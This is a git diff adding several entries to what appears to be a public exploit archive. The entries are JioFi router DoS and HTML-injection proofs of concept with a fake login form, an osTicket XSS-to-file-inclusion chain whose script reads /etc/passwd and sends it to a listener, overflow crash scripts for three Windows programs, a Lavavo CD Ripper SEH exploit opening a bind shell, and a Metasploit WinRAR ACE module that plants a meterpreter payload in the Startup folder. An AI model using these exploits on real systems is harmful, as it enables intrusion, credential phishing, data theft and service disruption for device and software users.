diff --git a/exploits/hardware/dos/46752.txt b/exploits/hardware/dos/46752.txt new file mode 100644 index 000000000..a6cfd636b --- /dev/null +++ b/exploits/hardware/dos/46752.txt @@ -0,0 +1,66 @@ +# Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices allows a DoS (Hang) via the mask POST parameter +# Exploit Author: Vikas Chaudhary +# Date: 21-01-2019 +# Vendor Homepage: https://www.jio.com/ +# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29 +# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router +# Category: Hardware +# Contact: https://www.facebook.com/profile.php?id=100011287630308 +# Web: https://gkaim.com/ +# Tested on: Windows 10 X64- Firefox-65.0 +# CVE-2019-7439 +*********************************************************************** +## Vulnerability Description :- A denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled. +---------------------------------------- +# Proof Of Concept: +1- First Open BurpSuite +2- Make Intercept on +3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ] +4-Capture the data and then Spider the Host +5- Now You find a Link like this [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ] +6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo&mask=0&token=0 ] +7-Vulnerable parameter is => mash +8-Paste this PAYLOD in mask parameter and then show Response in browser +Payload => + + + +9-Now it will show => {"commit":"Socket Connect Error"} +10-- It Means Router is Completely Stopped , +---------------------------------------- +Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter +----------------------------------------- +Solution:- + +You have to Remove your battery and then again insert it to make Normal. +----------------------------------------------------------------------------------- +REQUEST +------------ +POST /cgi-bin/qcmap_web_cgi HTTP/1.1 +Host: 192.168.225.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 +Accept: text/plain, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.225.1/ +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 167 +Connection: close + +Page=GetWANInfo&mask=&token=0 + +**************************** +RESPONSE +---------- +HTTP/1.1 200 OK +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +X-Frame-Options: SAMEORIGIN +connection: close +Content-Type: text/html +Content-Length: 33 +Date: Mon, 21 Jan 2019 18:17:34 GMT +Server: lighttpd/1.4.35 + +{"commit":"Socket Connect Error"} +--------------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/hardware/webapps/46751.txt b/exploits/hardware/webapps/46751.txt new file mode 100644 index 000000000..4c9b7e073 --- /dev/null +++ b/exploits/hardware/webapps/46751.txt @@ -0,0 +1,63 @@ +# Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter. +# Exploit Author: Vikas Chaudhary +# Date: 21-01-2019 +# Vendor Homepage: https://www.jio.com/ +# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29 +# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router +# Category: Hardware +# Contact: https://www.facebook.com/profile.php?id=100011287630308 +# Web: https://gkaim.com/ +# Tested on: Windows 10 X64- Firefox-65.0 +# CVE-2019-7438 +*********************************************************************** +## Vulnerability Description => HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute Javascript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust. +---------------------------------------- +# Proof Of ConceptoC +1- First Open BurpSuite +2- Make Intercept on +3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ] +4-Capture the data and then Spider the Host +5- Now You find a Link like like this [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ] +6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo&mask=0&token=0 ] +7-Vulnerable parameter is => mash +8-Paste this PAYLOAD in mask parameter and then show Response in browser +Payload => + +

Please login with valid credentials:- It's A Fake Login Page
Username:
Password:

+ +9- You will see a fake Login page on the screen - +---------------------------------------------------------------------------------- +Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter - +---------------------------------------------------------------------------------- +REQUEST +------------------- +POST /cgi-bin/qcmap_web_cgi HTTP/1.1 +Host: 192.168.225.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 +Accept: text/plain, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.225.1/ +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 550 +Connection: close + +Page=GetWANInfo&mask=

Please login with valid credentials:- It's A Fake Login Page
Username:
Password:

&token=0 + +**************************** +RESPONSE +----------------- + +HTTP/1.1 200 OK +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +X-Frame-Options: SAMEORIGIN +connection: close +Content-Type: text/html +Content-Length: 1167 +Date: Mon, 21 Jan 2019 18:02:07 GMT +Server: lighttpd/1.4.35 + +{"Page":"GetWANInfo","Mask":"

Please login with valid credentials:- It's A Fake Login Page
Username:
Password:

","wan_status":"On","total_data_used":"10005648","wan_operation_mode":"NAT","wan_connection_mode":"DHCP","wan_mac":"40:C8:CB:07:2C:8A","host_name":"JMR1140-072C8A","multi_pdn":"Disabled","ipv4_addr":"10.153.220.101","ipv4_subnet":"255.255.255.252","ipv4_gateway":"10.153.220.102","ipv4_primary":"49.45.0.1","ipv4_secondary":"0.0.0.0","ipv6_addr":"2409:4060:218e:b511:89ec:3214:def1:f75b","ipv6_subnet":"64","ipv6_gateway":"fe80::c9b3:928a:5eca:7e1c","ipv6_primary":"2405:200:800::1","ipv6_secondary":"::","channel":"automatic","packet_loss":"0 / 0","total_data_used_dlink":"5.11 MB","total_data_used_ulink":"4.37 MB"} + +--------------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/46753.txt b/exploits/php/webapps/46753.txt new file mode 100644 index 000000000..4c28e2184 --- /dev/null +++ b/exploits/php/webapps/46753.txt @@ -0,0 +1,107 @@ +# Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File +Inclusion +# Date: 09.04.2019 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) @ehakkus +# Contact: https://pentest.com.tr +# Vendor Homepage: https://osticket.com +# Software Link: https://github.com/osTicket/osTicket +# References: https://github.com/osTicket/osTicket/pull/4869 +# https://pentest.com.tr/exploits/osTicket-v1-11-XSS-to-LFI.html +# Version: v1.11 +# Category: Webapps +# Tested on: XAMPP for Linux +# Description: This is exploit proof of concept as XSS attempt can +# lead to an LFI (Local File Inclusion) attack at osTicket. +################################################################## +# PoC + +# There are two different XSS vulnerabilities in the "Import" +field on the Agent Panel - User Directory field. This vulnerability +causes a different vulnerability. The attacker can run the malicious +JS file that he uploads in the XSS vulnerability. Uploaded JS files +can be called clear text. Therefore, attackers do not have to use +a different server to perform an attack. Then it is possible to +create "Local File Inclusion" vulnerability too. + +The attacker can upload a JS file as follows. +------------------------------------------------------------------ + +function readTextFile(file) +{ + var rawFile = new XMLHttpRequest(); + rawFile.open("GET", file, false); + rawFile.onreadystatechange = function () + { + if(rawFile.readyState === 4) + { + if(rawFile.status === 200 || rawFile.status == 0) + { + var allText = rawFile.responseText; + allText.src = 'http://localhost:8001' + +rawFile.responseText; + document.body.appendChild(allText); + } + } + } + rawFile.send(null); +} + +readTextFile("/etc/passwd"); + +------------------------------------------------------------------ + +# Smilar JS File Link; + +/upload/file.php?key=y3cxcoxqv8r3miqczzj5ar8rhm1bhcbm +&expires=1554854400&signature=be5cea87c37d7971e0c54164090a391066ecbaca&id=36" + +After this process, we can run the JS file in XSS vulnerability. + + +# Our First Request for XSS to LFI; +------------------------------------------------------------------ + +POST /upload/scp/users.php?do=import-users +Host: localhost +Content-Type: multipart/form-data; boundary=---------------------------[] + + +-----------------------------[] +Content-Disposition: form-data; name="__CSRFToken__" + +8f6f85b8d76218112a53f909692f3c4ae7768b39 +-----------------------------[] +Content-Disposition: form-data; name="pasted" + + +-----------------------------[] +Content-Disposition: form-data; name="import"; filename="users-20190408.csv" +Content-Type: text/csv + + + +-----------------------------[]-- + + + + +# Our Second Request for XSS to LFI; +------------------------------------------------------------------ +POST /upload/scp/ajax.php/users/import HTTP/1.1 +Host: localhost + +__CSRFToken__=8f6f85b8d76218112a53f909692f3c4ae7768b39&pasted=%3Cscript+src%3D%22http%3A%2F%2Flocalhost%2F4%2FosTicket-v1.11%2Fupload%2Ffile.php%3Fkey%3Dy3cxcoxqv8r3miqczzj5ar8rhm1bhcbm%26expires%3D1554854400%26signature%3Dbe5cea87c37d7971e0c54164090a391066ecbaca%26id%3D36%22%3E%3C%2Fscript%3E&undefined=Import+Users +------------------------------------------------------------------ + + +# After sending XSS requests, +# When the attacker listens to port 8001, he/she will receive a request as +follows. + +root@AkkuS:~# python -m SimpleHTTPServer 8001 +Serving HTTP on 0.0.0.0 port 8001 ... +127.0.0.1 - - [09/Apr/2019 11:54:42] "GET / HTTP/1.1" 200 - +127.0.0.1 - - [09/Apr/2019 11:54:42] "GET +/root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin...[More] \ No newline at end of file diff --git a/exploits/windows/dos/46749.py b/exploits/windows/dos/46749.py new file mode 100755 index 000000000..b4db7b83f --- /dev/null +++ b/exploits/windows/dos/46749.py @@ -0,0 +1,24 @@ +#Exploit Title: HeidiSQL Portable 10.1.0.5464 - Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2019-04-24 +#Vendor Homepage: https://www.heidisql.com/ +#Software Link: https://www.heidisql.com/downloads/releases/HeidiSQL_10.1_64_Portable.zip +#Tested Version: 10.1.0.5464 +#Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1 + +#Steps to produce the crash: +#1.- Run python code: HeidiSQL_Portable_10.1.0.5464.py +#2.- Open bd_p.txt and copy content to clipboard +#2.- Open HeidiSQL +#3.- Select "New" +#4.- In Network type select "Microsoft SQL Server (TCP/IP)" +#5.- Enable "Prompt for credentials" > click on "Open" +#6.- In Login select "Password" and Paste ClipBoard +#6.- Click on "Login" +#7.- Crashed + +cod = "\x41" * 2000 + +f = open('bd_p.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46750.py b/exploits/windows/dos/46750.py new file mode 100755 index 000000000..1b810d47e --- /dev/null +++ b/exploits/windows/dos/46750.py @@ -0,0 +1,23 @@ +#Exploit Title: Backup Key Recovery 2.2.4 - 'Name' Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2019-04-24 +#Vendor Homepage: www.nsauditor.com +#Software Link: http://www.nsauditor.com/downloads/backeyrecovery_setup.exe +#Tested Version: 2.2.4 +#Tested on: Windows 7 x64 Service Pack 1 + +#Steps to produce the crash: +#1.- Run python code: Backup_key_rec_2.2.4.py +#2.- Open backup.txt and copy content to clipboard +#3.- Open Backup Key Recovery +#4.- Select "Register" +#5.- In "Name" paste Clipboard +#6.- In Key type "test" +#7.- Click "Ok" +#8.- Crarshed + +cod = "\x41" * 300 + +f = open('backup.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46754.py b/exploits/windows/dos/46754.py new file mode 100755 index 000000000..4b92199fe --- /dev/null +++ b/exploits/windows/dos/46754.py @@ -0,0 +1,29 @@ +# Exploit Title: AnMing MP3 CD Burner 2.0 Local Dos Exploit +# Date: 25.04.2019 +# Vendor Homepage:http://www.ddz1977.com/ +# Software Link: https://files.downloadnow.com/s/software/10/56/16/74/anming_setup.zip?token=1556228877_063f2dc0aed064ee5d13374d8509661c&fileName=anming_setup.zip +# Exploit Author: Achilles +# Tested Version: 2.0 +# Tested on: Windows 7 x64 Sp1 +# Windows XP x86 Sp3 + + +# 1.- Run python code :AnMing.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open Anming.exe and Click 'Register' +# 4.- Paste the content of EVIL.txt into the Field: 'Your Name and Registration Code' +# 5.- Click 'OK'and you will see a crash. + + + +#!/usr/bin/env python +buffer = "\x41" * 6000 + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/local/46755.py b/exploits/windows/local/46755.py new file mode 100755 index 000000000..c9d2a1ca8 --- /dev/null +++ b/exploits/windows/local/46755.py @@ -0,0 +1,65 @@ +# Exploit Title: Lavavo CD Ripper 4.20 Local Seh Exploit +# Date: 25.04.2019 +# Vendor Homepage:https://www.lavavosoftware.com +# Software Link: https://lavavo-cd-ripper.jaleco.com/download +# Exploit Author: Achilles +# Tested Version: 4.20 +# Tested on: Windows XP SP3 EN +# Windows 7 Sp1 x64 + +# 1.- Run python code : Lavavo.py +# 2.- Open EVIL.txt and copy content to Clipboard +# 3.- Open LavavoCDRipper.exe and click UNLOCK. +# 4.- Paste the Content of EVIL.txt into the 'License Activation Name' +# 5.- License Key 123456789 +# 6.- Click 'Unlock Now' and you will have a bind shell port 3110. + +#!/usr/bin/env python +import struct + +buffer = "\x41" * 300 +nseh = "\xeb\x06\x90\x90" #jmp short 6 +seh = struct.pack(' 'RARLAB WinRAR ACE Format Input Validation Remote Code Execution', + 'Description' => %q{ + In WinRAR versions prior to and including 5.61, there is path traversal vulnerability + when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename + field is manipulated with specific patterns, the destination (extraction) folder is + ignored, thus treating the filename as an absolute path. This module will attempt to + extract a payload to the startup folder of the current user. It is limited such that + we can only go back one folder. Therefore, for this exploit to work properly, the user + must extract the supplied RAR file from one folder within the user profile folder + (e.g. Desktop or Downloads). User restart is required to gain a shell. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nadav Grossman', # exploit discovery + 'Imran E. Dawoodjee ' # Metasploit module + ], + 'References' => + [ + ['CVE', '2018-20250'], + ['EDB', '46552'], + ['BID', '106948'], + ['URL', 'https://research.checkpoint.com/extracting-code-execution-from-winrar/'], + ['URL', 'https://apidoc.roe.ch/acefile/latest/'], + ['URL', 'http://www.hugi.scene.org/online/coding/hugi%2012%20-%20coace.htm'], + ], + 'Platform' => 'win', + 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }, + 'Targets' => + [ + [ 'RARLAB WinRAR <= 5.61', {} ] + ], + 'DisclosureDate' => 'Feb 05 2019', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The output file name.', 'msf.ace']), + OptString.new('CUSTFILE', [ false, 'User-defined custom payload', '']), + OptString.new('FILE_LIST', [false, 'List of other non-payload files to add', '']) + ]) + + end + + def exploit + ace_header = "" + # All hex values are already in little endian. + # HEAD_CRC: Lower 2 bytes of CRC32 of 49 bytes of header after HEAD_TYPE. + # The bogus value for HEAD_CRC will be replaced later. + ace_header << "AA" + # HEAD_SIZE: header size. \x31\x00 says 49. + ace_header << "\x31\x00" + # HEAD_TYPE: header type. Archive header is 0. + ace_header << "\x00" + # HEAD_FLAGS: header flags + ace_header << "\x00\x90" + # ACE magic + ace_header << "\x2A\x2A\x41\x43\x45\x2A\x2A" + # VER_EXTRACT: version needed to extract archive + ace_header << "\x14" + # VER_CREATED: version used to create archive + ace_header << "\x14" + # HOST_CREATED: host OS for ACE used to create archive + ace_header << "\x02" + # VOLUME_NUM: which volume of a multi-volume archive? + ace_header << "\x00" + # TIME_CREATED: date and time in MS-DOS format + ace_header << "\x10\x18\x56\x4E" + # RESERVED1 + ace_header << "\x97\x4F\xF6\xAA\x00\x00\x00\x00" + # AV_SIZE: advert size + ace_header << "\x16" + # AV: advert which shows if registered/unregistered. + # Full advert says "*UNREGISTERED VERSION*" + ace_header << "\x2A\x55\x4E\x52\x45\x47\x49\x53\x54\x45\x52\x45\x44\x20\x56\x45\x52\x53\x49\x4F\x4E\x2A" + + # calculate the CRC32 of ACE header, and get the lower 2 bytes + ace_header_crc32 = crc32(ace_header[4, ace_header.length]).to_s(16) + ace_header_crc16 = ace_header_crc32.last(4).to_i(base=16) + ace_header[0,2] = [ace_header_crc16].pack("v") + + # start putting the ACE file together + ace_file = "" + ace_file << ace_header + + # create headers and append file data after header + unless datastore["FILE_LIST"].empty? + print_status("Using the provided list of files @ #{datastore["FILE_LIST"]}...") + File.binread(datastore["FILE_LIST"]).each_line do |file| + file = file.chomp + file_header_and_data = create_file_header_and_data(file, false, false) + ace_file << file_header_and_data + end + end + + # autogenerated payload + if datastore["CUSTFILE"].empty? + payload_filename = "" + # 72 characters + payload_filename << "C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + # 6 characters + payload_filename << rand_text_alpha(6) + # 4 characters + payload_filename << ".exe" + payload_file_header = create_file_header_and_data(payload_filename, true, false) + # user-defined payload + else + print_status("Using a custom payload: #{::File.basename(datastore["CUSTFILE"])}") + payload_filename = "" + # 72 characters + payload_filename << "C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + # n characters + payload_filename << ::File.basename(datastore["CUSTFILE"]) + payload_file_header = create_file_header_and_data(payload_filename, true, true) + end + + vprint_status("Payload filename: #{payload_filename.from(72)}") + + # append payload file header and the payload itself into the rest of the data + ace_file << payload_file_header + # create the file + file_create(ace_file) + end + + # The CRC implementation used in ACE does not take the last step in calculating CRC32. + # That is, it does not flip the bits. Therefore, it can be easily calculated by taking + # the negative bitwise OR of the usual CRC and then subtracting one from it. This is due to + # the way the bitwise OR works in Ruby: unsigned integers are not a thing in Ruby, so + # applying a bitwise OR on an integer will produce its negative + 1. + def crc32(data) + table = Zlib.crc_table + crc = 0xffffffff + data.unpack('C*').each { |b| + crc = table[(crc & 0xff) ^ b] ^ (crc >> 8) + } + -(~crc) - 1 + end + + # create file headers for each file to put into the output ACE file + def create_file_header_and_data(path, is_payload, is_custom_payload) + #print_status("Length of #{path}: #{path.length}") + if is_payload and is_custom_payload + file_data = File.binread(path.from(72)) + elsif is_payload and !is_custom_payload + file_data = generate_payload_exe + else + file_data = File.binread(File.basename(path)) + end + + file_data_crc32 = crc32(file_data).to_i + + # HEAD_CRC: Lower 2 bytes of CRC32 of the next bytes of header after HEAD_TYPE. + # The bogus value for HEAD_CRC will be replaced later. + file_header = "" + file_header << "AA" + # HEAD_SIZE: file header size. + if is_payload + file_header << [31 + path.length].pack("v") + else + file_header << [31 + ::File.basename(path).length].pack("v") + end + # HEAD_TYPE: header type is 1. + file_header << "\x01" + # HEAD_FLAGS: header flags. \x01\x80 is ADDSIZE|SOLID. + file_header << "\x01\x80" + # PACK_SIZE: size when packed. + file_header << [file_data.length].pack("V") + #print_status("#{file_data.length}") + # ORIG_SIZE: original size. Same as PACK_SIZE since no compression is *truly* taking place. + file_header << [file_data.length].pack("V") + # FTIME: file date and time in MS-DOS format + file_header << "\x63\xB0\x55\x4E" + # ATTR: DOS/Windows file attribute bit field, as int, as produced by the Windows GetFileAttributes() API. + file_header << "\x20\x00\x00\x00" + # CRC32: CRC32 of the compressed file + file_header << [file_data_crc32].pack("V") + # Compression type + file_header << "\x00" + # Compression quality + file_header << "\x03" + # Parameter for decompression + file_header << "\x0A\x00" + # RESERVED1 + file_header << "\x54\x45" + # FNAME_SIZE: size of filename string + if is_payload + file_header << [path.length].pack("v") + else + # print_status("#{::File.basename(path).length}") + file_header << [::File.basename(path).length].pack("v") + end + #file_header << [path.length].pack("v") + # FNAME: filename string. Empty for now. Fill in later. + if is_payload + file_header << path + else + file_header << ::File.basename(path) + end + + #print_status("Calculating other_file_header...") + file_header_crc32 = crc32(file_header[4, file_header.length]).to_s(16) + file_header_crc16 = file_header_crc32.last(4).to_i(base=16) + file_header[0,2] = [file_header_crc16].pack("v") + file_header << file_data + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a5350d891..50b42553c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6398,6 +6398,10 @@ id,file,description,date,author,type,platform,port 46743,exploits/linux/dos/46743.txt,"systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit",2019-04-23,"Google Security Research",dos,linux, 46744,exploits/linux/dos/46744.c,"Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition",2019-04-23,"Google Security Research",dos,linux, 46745,exploits/linux/dos/46745.txt,"Linux - 'page->_refcount' Overflow via FUSE",2019-04-23,"Google Security Research",dos,linux, +46749,exploits/windows/dos/46749.py,"HeidiSQL 10.1.0.5464 - Denial of Service (PoC)",2019-04-25,"Victor Mondragón",dos,windows, +46750,exploits/windows/dos/46750.py,"Backup Key Recovery 2.2.4 - Denial of Service (PoC)",2019-04-25,"Victor Mondragón",dos,windows, +46752,exploits/hardware/dos/46752.txt,"JioFi 4G M2S 1.0.2 - Denial of Service",2019-04-25,"Vikas Chaudhary",dos,hardware, +46754,exploits/windows/dos/46754.py,"AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)",2019-04-25,Achilles,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10438,6 +10442,8 @@ id,file,description,date,author,type,platform,port 46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows, 46742,exploits/windows/local/46742.txt,"Ross Video DashBoard 8.5.1 - Insecure Permissions",2019-04-23,LiquidWorm,local,windows, 46747,exploits/windows/local/46747.txt,"VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation",2019-04-24,"Google Security Research",local,windows, +46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows, +46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -41181,3 +41187,5 @@ id,file,description,date,author,type,platform,port 46738,exploits/php/webapps/46738.html,"74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)",2019-04-22,ax8,webapps,php,80 46739,exploits/php/webapps/46739.html,"Msvod 10 - Cross-Site Request Forgery (Change User Information)",2019-04-22,ax8,webapps,php,80 46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80 +46751,exploits/hardware/webapps/46751.txt,"JioFi 4G M2S 1.0.2 - 'mask' Cross-Site Scripting",2019-04-25,"Vikas Chaudhary",webapps,hardware, +46753,exploits/php/webapps/46753.txt,"osTicket 1.11 - Cross-Site Scripting / Local File Inclusion",2019-04-25,AkkuS,webapps,php,80